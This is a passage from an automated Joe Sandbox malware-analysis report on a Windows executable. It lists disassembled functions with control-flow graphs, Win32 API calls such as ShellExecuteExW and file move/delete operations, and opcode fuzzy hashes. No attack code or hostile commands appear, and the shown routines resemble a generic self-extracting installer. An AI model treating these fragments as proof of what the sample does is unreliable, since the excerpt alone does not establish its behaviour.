                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                              • String ID: \
                                                                                              • API String ID: 3569833718-2967466578
                                                                                              • Opcode ID: 1849a1ca69e3302fabc2bc0785c5fff31b43d8c02e9d2255a53deefda447a26d
                                                                                              • Instruction ID: eb9f788f01c17f5d4494047953326439fd3d87cc25c11b243faba542e041571c
                                                                                              • Opcode Fuzzy Hash: 1849a1ca69e3302fabc2bc0785c5fff31b43d8c02e9d2255a53deefda447a26d
                                                                                              • Instruction Fuzzy Hash: 883126B1145B40BFD713DF20EC0AFAF3FACFB42306F900918F5A1961A1C7A459058BA6
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032E8DF Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 184windowCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 667 32e8df-32e8f7 call 32ffd0 670 32eb38-32eb40 667->670 671 32e8fd-32e909 call 334fa3 667->671 671->670 674 32e90f-32e937 call 3311b0 671->674 677 32e941-32e94f 674->677 678 32e939 674->678 679 32e962-32e968 677->679 680 32e951-32e954 677->680 678->677 682 32e9ab-32e9ae 679->682 681 32e958-32e95e 680->681 683 32e960 681->683 684 32e987-32e994 681->684 682->681 685 32e9b0-32e9b6 682->685 686 32e972-32e97c 683->686 687 32eb10-32eb12 684->687 688 32e99a-32e99e 684->688 689 32e9b8-32e9bb 685->689 690 32e9bd-32e9bf 685->690 691 32e96a-32e970 686->691 692 32e97e 686->692 693 32eb16 687->693 688->693 694 32e9a4-32e9a9 688->694 689->690 695 32e9d2-32e9e8 call 31cd5c 689->695 690->695 696 32e9c1-32e9c8 690->696 691->686 698 32e980-32e983 691->698 692->684 701 32eb1f 693->701 694->682 702 32ea01-32ea0c call 31b4c1 695->702 703 32e9ea-32e9f7 call 323316 695->703 696->695 699 32e9ca 696->699 698->684 699->695 704 32eb26-32eb28 701->704 713 32ea29-32ea36 ShellExecuteExW 702->713 714 32ea0e-32ea25 call 31cad4 702->714 703->702 712 32e9f9 703->712 707 32eb37 704->707 708 32eb2a-32eb2c 704->708 707->670 708->707 711 32eb2e-32eb31 ShowWindow 708->711 711->707 712->702 713->707 716 32ea3c-32ea49 713->716 714->713 718 32ea4b-32ea52 716->718 719 32ea5c-32ea5e 716->719 718->719 720 32ea54-32ea5a 718->720 721 32ea60-32ea69 IsWindowVisible 719->721 722 32ea75-32ea88 WaitForInputIdle call 32ed8b 719->722 720->719 723 32eacb-32ead7 CloseHandle 720->723 721->722 724 32ea6b-32ea73 ShowWindow 721->724 726 32ea8d-32ea94 722->726 727 32eae8-32eaf6 723->727 728 32ead9-32eae6 call 323316 723->728 724->722 726->723 730 32ea96-32ea9e 726->730 727->704 729 32eaf8-32eafa 727->729 728->701 728->727 729->704 732 32eafc-32eb02 729->732 730->723 733 32eaa0-32eab1 GetExitCodeProcess 730->733 732->704 735 32eb04-32eb0e 732->735 733->723 736 32eab3-32eabd 733->736 735->704 737 32eac4 736->737 738 32eabf 736->738 737->723 738->737
                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 0032E8FE
                                                                                              • ShellExecuteExW.SHELL32(?), ref: 0032EA2E
                                                                                              • IsWindowVisible.USER32(?), ref: 0032EA61
                                                                                              • ShowWindow.USER32(?,00000000), ref: 0032EA6D
                                                                                              • WaitForInputIdle.USER32(?,000007D0), ref: 0032EA7E
                                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 0032EAA9
                                                                                              • CloseHandle.KERNEL32(?), ref: 0032EACF
                                                                                              • ShowWindow.USER32(?,00000001), ref: 0032EB31
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Show$CloseCodeExecuteExitHandleIdleInputProcessShellVisibleWait_wcslen
                                                                                              • String ID: .exe$.inf$Ld4
                                                                                              • API String ID: 3646668279-4202968764
                                                                                              • Opcode ID: 15869eccb10596659f5c6e0434fd42e2f6a5b828c9df8d189278bc9a1d18c625
                                                                                              • Instruction ID: c1df1d29019202dcd5ae3a1bc47d214b2ec108b3225bbdf4596661e768f664a5
                                                                                              • Opcode Fuzzy Hash: 15869eccb10596659f5c6e0434fd42e2f6a5b828c9df8d189278bc9a1d18c625
                                                                                              • Instruction Fuzzy Hash: F05103314083A09ADB33DB64B846BAB7BE8BF41740F0A481EF5C597190EBB59884CB52
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032B6D2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100memorywindowCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 739 32b6d2-32b6ef FindResourceW 740 32b6f5-32b706 SizeofResource 739->740 741 32b7eb 739->741 740->741 743 32b70c-32b71b LoadResource 740->743 742 32b7ed-32b7f1 741->742 743->741 744 32b721-32b72c LockResource 743->744 744->741 745 32b732-32b747 GlobalAlloc 744->745 746 32b7e3-32b7e9 745->746 747 32b74d-32b756 GlobalLock 745->747 746->742 748 32b7dc-32b7dd GlobalFree 747->748 749 32b75c-32b77a call 332dc0 747->749 748->746 753 32b7d5-32b7d6 GlobalUnlock 749->753 754 32b77c-32b79e call 32b636 749->754 753->748 754->753 759 32b7a0-32b7a8 754->759 760 32b7c3-32b7d1 759->760 761 32b7aa-32b7be GdipCreateHBITMAPFromBitmap 759->761 760->753 761->760 762 32b7c0 761->762 762->760
                                                                                              APIs
                                                                                              • FindResourceW.KERNELBASE(?,PNG,00000000,?,?,?,0032C92D,00000066), ref: 0032B6E5
                                                                                              • SizeofResource.KERNEL32(00000000,?,?,?,0032C92D,00000066), ref: 0032B6FC
                                                                                              • LoadResource.KERNEL32(00000000,?,?,?,0032C92D,00000066), ref: 0032B713
                                                                                              • LockResource.KERNEL32(00000000,?,?,?,0032C92D,00000066), ref: 0032B722
                                                                                              • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0032C92D,00000066), ref: 0032B73D
                                                                                              • GlobalLock.KERNEL32(00000000,?,?,?,?,?,0032C92D,00000066), ref: 0032B74E
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0032B7D6
                                                                                                • Part of subcall function 0032B636: GdipAlloc.GDIPLUS(00000010), ref: 0032B63C
                                                                                              • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0032B7B7
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 0032B7DD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
                                                                                              • String ID: PNG
                                                                                              • API String ID: 541704414-364855578
                                                                                              • Opcode ID: 97592da754835bbededcb0ede245b2d337bdf94149e5bcfce6239b8324f775ce
                                                                                              • Instruction ID: cf09d282528dc2c0a5aa48b073e0d0f9e6c992d69150febdec62abee16ae81fa
                                                                                              • Opcode Fuzzy Hash: 97592da754835bbededcb0ede245b2d337bdf94149e5bcfce6239b8324f775ce
                                                                                              • Instruction Fuzzy Hash: A6316175600712AFD7139F65EC88E1BBFACEF85791F060528F905D6261EF31E844CAA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0033BB1B Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 764 33bb1b-33bb34 765 33bb36-33bb46 call 34010c 764->765 766 33bb4a-33bb4f 764->766 765->766 773 33bb48 765->773 768 33bb51-33bb59 766->768 769 33bb5c-33bb80 MultiByteToWideChar 766->769 768->769 771 33bd13-33bd26 call 330d7c 769->771 772 33bb86-33bb92 769->772 774 33bbe6 772->774 775 33bb94-33bba5 772->775 773->766 777 33bbe8-33bbea 774->777 778 33bba7-33bbb6 call 3431d0 775->778 779 33bbc4-33bbd5 call 33a7fe 775->779 781 33bbf0-33bc03 MultiByteToWideChar 777->781 782 33bd08 777->782 778->782 792 33bbbc-33bbc2 778->792 779->782 789 33bbdb 779->789 781->782 786 33bc09-33bc1b call 33c12c 781->786 787 33bd0a-33bd11 call 33bd83 782->787 794 33bc20-33bc24 786->794 787->771 793 33bbe1-33bbe4 789->793 792->793 793->777 794->782 796 33bc2a-33bc31 794->796 797 33bc33-33bc38 796->797 798 33bc6b-33bc77 796->798 797->787 801 33bc3e-33bc40 797->801 799 33bcc3 798->799 800 33bc79-33bc8a 798->800 804 33bcc5-33bcc7 799->804 802 33bca5-33bcb6 call 33a7fe 800->802 803 33bc8c-33bc9b call 3431d0 800->803 801->782 805 33bc46-33bc60 call 33c12c 801->805 808 33bd01-33bd07 call 33bd83 802->808 818 33bcb8 802->818 803->808 816 33bc9d-33bca3 803->816 804->808 809 33bcc9-33bce2 call 33c12c 804->809 805->787 820 33bc66 805->820 808->782 809->808 821 33bce4-33bceb 809->821 822 33bcbe-33bcc1 816->822 818->822 820->782 823 33bd27-33bd2d 821->823 824 33bced-33bcee 821->824 822->804 825 33bcef-33bcff WideCharToMultiByte 823->825 824->825 825->808 826 33bd2f-33bd36 call 33bd83 825->826 826->787
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,003369A3,003369A3,?,?,?,0033BD6C,00000001,00000001,62E85006), ref: 0033BB75
                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0033BD6C,00000001,00000001,62E85006,?,?,?), ref: 0033BBFB
                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,62E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0033BCF5
                                                                                              • __freea.LIBCMT ref: 0033BD02
                                                                                                • Part of subcall function 0033A7FE: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0033DBEC,00000000,?,003380B1,?,00000008,?,0033A871,?,?,?), ref: 0033A830
                                                                                              • __freea.LIBCMT ref: 0033BD0B
                                                                                              • __freea.LIBCMT ref: 0033BD30
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1414292761-0
                                                                                              • Opcode ID: f2077ea574f4ff2a16ed0bde7dd2c0b46eef421827e5f6589cca05d32c8315f0
                                                                                              • Instruction ID: 6939df570cc2a0b848c1ebeb7fab71e35349c880d2daf92354f2ed7ef550b3af
                                                                                              • Opcode Fuzzy Hash: f2077ea574f4ff2a16ed0bde7dd2c0b46eef421827e5f6589cca05d32c8315f0
                                                                                              • Instruction Fuzzy Hash: 9551D172610216ABEB268F64DCC2EBFB7A9EF44750F164629FE05DA150DB35EC80C690
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032C324 Relevance: 9.1, APIs: 6, Instructions: 56COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 829 32c324-32c342 GetCurrentProcess OpenProcessToken 830 32c3a7 829->830 831 32c344-32c35c GetTokenInformation 829->831 832 32c3a9-32c3ab 830->832 833 32c369-32c38a call 337566 GetTokenInformation 831->833 834 32c35e-32c367 GetLastError 831->834 837 32c39b-32c3a5 call 335219 833->837 838 32c38c-32c399 CopySid 833->838 834->830 834->833 837->832 838->837
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(00020008,0032BF14,?,?,?,?,0032BF14,?), ref: 0032C333
                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0032BF14,?), ref: 0032C33A
                                                                                              • GetTokenInformation.KERNELBASE(0032BF14,00000001(TokenIntegrityLevel),00000000,00000000,?,?,?,?,?,0032BF14,?), ref: 0032C354
                                                                                              • GetLastError.KERNEL32(?,?,?,?,0032BF14,?), ref: 0032C35E
                                                                                              • GetTokenInformation.KERNELBASE(0032BF14,00000001(TokenIntegrityLevel),00000000,?,?,?,?,?,?,?,0032BF14,?), ref: 0032C382
                                                                                              • CopySid.ADVAPI32(00000044,0032BF14,00000000,?,?,?,?,?,0032BF14,?), ref: 0032C393
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: Token$InformationProcess$CopyCurrentErrorLastOpen
                                                                                              • String ID:
                                                                                              • API String ID: 3984476752-0
                                                                                              • Opcode ID: a17c7e14369b8c6ff36b877a478283c87c2c697509bb5d06f9745ef860890103
                                                                                              • Instruction ID: a8168a08f4d697a5ac4a8d6005a6c3cee3eed1235c2a11f4a41a4ee622b6165f
                                                                                              • Opcode Fuzzy Hash: a17c7e14369b8c6ff36b877a478283c87c2c697509bb5d06f9745ef860890103
                                                                                              • Instruction Fuzzy Hash: CB018076510218FFEB269BA0FC89EEEBB6DEF05340F104425F609D5050D6758E90AA60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032ED8B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 841 32ed8b-32eda4 WaitForSingleObject 842 32eda6-32eda7 841->842 843 32edec-32edee 841->843 844 32eda9-32edb9 PeekMessageW 842->844 845 32edbb-32edd6 GetMessageW TranslateMessage DispatchMessageW 844->845 846 32eddc-32ede9 WaitForSingleObject 844->846 845->846 846->844 847 32edeb 846->847 847->843
                                                                                              APIs
                                                                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0032ED97
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0032EDB1
                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0032EDC2
                                                                                              • TranslateMessage.USER32(?), ref: 0032EDCC
                                                                                              • DispatchMessageW.USER32(?), ref: 0032EDD6
                                                                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0032EDE1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                                              • String ID:
                                                                                              • API String ID: 2148572870-0
                                                                                              • Opcode ID: 6720d8ffb9c12a6de53547f902a882a4ff44211fd3d9457c9ed5807851eb7f78
                                                                                              • Instruction ID: 6abb76a1d7dedb47ad965a27a89a027c3ddc4175fa15c8a129021ee5ad4a94b9
                                                                                              • Opcode Fuzzy Hash: 6720d8ffb9c12a6de53547f902a882a4ff44211fd3d9457c9ed5807851eb7f78
                                                                                              • Instruction Fuzzy Hash: 89F03776A01629ABCB326BA5EC4DECFBE6CEF42391F108421B60AD6050D6749595CBE0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032DFCC Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 848 32dfcc-32dfcf 849 32dfd5-32dffa GetTempPathW call 31caa0 848->849 850 32e14e-32e151 848->850 858 32dffe-32e02a call 314a20 call 31b4c1 849->858 852 32e157-32e15d 850->852 853 32e51e-32e549 call 32c504 850->853 855 32e169-32e170 852->855 856 32e15f 852->856 861 32d8d8-32d8e6 853->861 862 32e54f-32e55d 853->862 855->853 856->855 871 32dffc-32dffd 858->871 872 32e02c-32e043 SetDlgItemTextW 858->872 863 32d8e7-32d8fc call 32c11c 861->863 870 32d8fe 863->870 873 32d900-32d915 call 323316 870->873 871->858 872->853 874 32e049-32e04f 872->874 879 32d922-32d925 873->879 880 32d917-32d91b 873->880 874->853 876 32e055-32e070 call 3333ac 874->876 884 32e072-32e07e 876->884 885 32e0c0-32e0c7 876->885 879->853 883 32d92b 879->883 880->873 882 32d91d 880->882 882->853 888 32d932-32d935 883->888 889 32db03-32db05 883->889 890 32dbc1-32dbc3 883->890 891 32dba4-32dba6 883->891 884->885 892 32e080 884->892 886 32e0f9-32e129 call 32bea2 call 32b7f4 885->886 887 32e0c9-32e0f4 call 32192f * 2 885->887 886->853 925 32e12f-32e149 EndDialog 886->925 887->886 888->853 899 32d93b-32d995 call 32b65d call 31d200 call 31b93d call 31ba77 call 3179e5 888->899 889->853 897 32db0b-32db17 889->897 890->853 896 32dbc9-32dbd0 890->896 891->853 894 32dbac-32dbbc SetWindowTextW 891->894 893 32e083-32e087 892->893 900 32e09b-32e0b8 call 32192f 893->900 901 32e089-32e097 893->901 894->853 896->853 903 32dbd6-32dbef 896->903 904 32db2b-32db30 897->904 905 32db19-32db2a call 338a79 897->905 966 32dad4-32dae9 call 31b9ca 899->966 900->885 901->893 910 32e099 901->910 913 32dbf1 903->913 914 32dbf7-32dc05 call 334fa3 903->914 908 32db32-32db38 904->908 909 32db3a-32db45 call 32c67e 904->909 905->904 919 32db4a-32db4c 908->919 909->919 910->885 913->914 914->853 934 32dc0b-32dc14 914->934 928 32db57-32db77 call 334fa3 call 33521e 919->928 929 32db4e-32db55 call 334fa3 919->929 925->853 954 32db90-32db92 928->954 955 32db79-32db80 928->955 929->928 935 32dc16-32dc1a 934->935 936 32dc3d-32dc40 934->936 940 32dc46-32dc49 935->940 941 32dc1c-32dc24 935->941 936->940 943 32dd25-32dd33 call 32192f 936->943 948 32dc56-32dc71 940->948 949 32dc4b-32dc50 940->949 941->853 946 32dc2a-32dc38 call 32192f 941->946 956 32dd35-32dd49 call 3336be 943->956 946->956 967 32dc73-32dcad 948->967 968 32dcbb-32dcc2 948->968 949->943 949->948 954->853 957 32db98-32db9f call 335219 954->957 961 32db82-32db84 955->961 962 32db87-32db8f call 338a79 955->962 976 32dd56-32ddb0 call 32192f call 32c3ae GetDlgItem SetWindowTextW SendMessageW call 337306 956->976 977 32dd4b-32dd4f 956->977 957->853 961->962 962->954 983 32d99a-32d9ae SetFileAttributesW 966->983 984 32daef-32dafe call 31b953 966->984 994 32dcb1-32dcb3 967->994 995 32dcaf 967->995 970 32dcf0-32dd13 call 334fa3 * 2 968->970 971 32dcc4-32dcdc call 334fa3 968->971 970->956 1005 32dd15-32dd23 call 321907 970->1005 971->970 987 32dcde-32dceb call 321907 971->987 976->853 1016 32ddb6-32ddca SendMessageW 976->1016 977->976 982 32dd51-32dd53 977->982 982->976 989 32da54-32da64 GetFileAttributesW 983->989 990 32d9b4-32d9e7 call 31cdc0 call 31caa0 call 334fa3 983->990 984->853 987->970 989->966 1000 32da66-32da75 DeleteFileW 989->1000 1020 32d9fa-32da08 call 31d1c1 990->1020 1021 32d9e9-32d9f8 call 334fa3 990->1021 994->968 995->994 1000->966 1004 32da77-32da7a 1000->1004 1008 32da7e-32daaa call 314a20 GetFileAttributesW 1004->1008 1005->956 1017 32da7c-32da7d 1008->1017 1018 32daac-32dac2 MoveFileW 1008->1018 1016->853 1017->1008 1018->966 1022 32dac4-32dace MoveFileExW 1018->1022 1020->984 1027 32da0e-32da4e call 334fa3 call 3311b0 SHFileOperationW 1020->1027 1021->1020 1021->1027 1022->966 1027->989
                                                                                              APIs
                                                                                              • GetTempPathW.KERNEL32(00000800,?), ref: 0032DFE2
                                                                                                • Part of subcall function 0031CAA0: _wcslen.LIBCMT ref: 0031CAA6
                                                                                              • _swprintf.LIBCMT ref: 0032E016
                                                                                                • Part of subcall function 00314A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00314A33
                                                                                              • SetDlgItemTextW.USER32(?,00000066,00362892), ref: 0032E036
                                                                                              • EndDialog.USER32(?,00000001), ref: 0032E143
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                                                                              • String ID: %s%s%u
                                                                                              • API String ID: 110358324-1360425832
                                                                                              • Opcode ID: 314528a8e3ac3e60cc00d5fc45e0945eba869a6101919f6ec2bdf4d2113e65a3
                                                                                              • Instruction ID: c80715afed92df4a78c51b89cef7f22d051e69c91e5a73d8f9af74c76e1cf60c
                                                                                              • Opcode Fuzzy Hash: 314528a8e3ac3e60cc00d5fc45e0945eba869a6101919f6ec2bdf4d2113e65a3
                                                                                              • Instruction Fuzzy Hash: 57416475900628AADF27DB65DC45FEA77BCEB04700F4180A6F909AB051EF709A84CF61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032BD1B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34comCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 00321B3B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00321B56
                                                                                                • Part of subcall function 00321B3B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0032063A,Crypt32.dll,00000000,003206B4,00000200,?,00320697,00000000,00000000,?), ref: 00321B78
                                                                                              • OleInitialize.OLE32(00000000), ref: 0032BD34
                                                                                              • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0032BD6B
                                                                                              • SHGetMalloc.SHELL32(0035A460), ref: 0032BD75
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                              • String ID: riched20.dll$3To
                                                                                              • API String ID: 3498096277-2168385784
                                                                                              • Opcode ID: 328b5b1ad6f3eb55ca601475134c2ad635d182b207a35f34e1fe67cbc0e87231
                                                                                              • Instruction ID: 078d5d6d0df2837358a4a8107f353b4f47d912f7ac8ac83a643f001bba7f632e
                                                                                              • Opcode Fuzzy Hash: 328b5b1ad6f3eb55ca601475134c2ad635d182b207a35f34e1fe67cbc0e87231
                                                                                              • Instruction Fuzzy Hash: E9F062B1D00219AFCB21AF95D8499EFFFFCEF80301F004016E405E2210D7B45645CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00320627 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1036 320627-32062e 1037 320663-320664 1036->1037 1038 320630-32063e call 321b3b 1036->1038 1041 320640-32065c GetProcAddress * 2 1038->1041 1042 32065f 1038->1042 1041->1042 1042->1037
                                                                                              APIs
                                                                                                • Part of subcall function 00321B3B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00321B56
                                                                                                • Part of subcall function 00321B3B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0032063A,Crypt32.dll,00000000,003206B4,00000200,?,00320697,00000000,00000000,?), ref: 00321B78
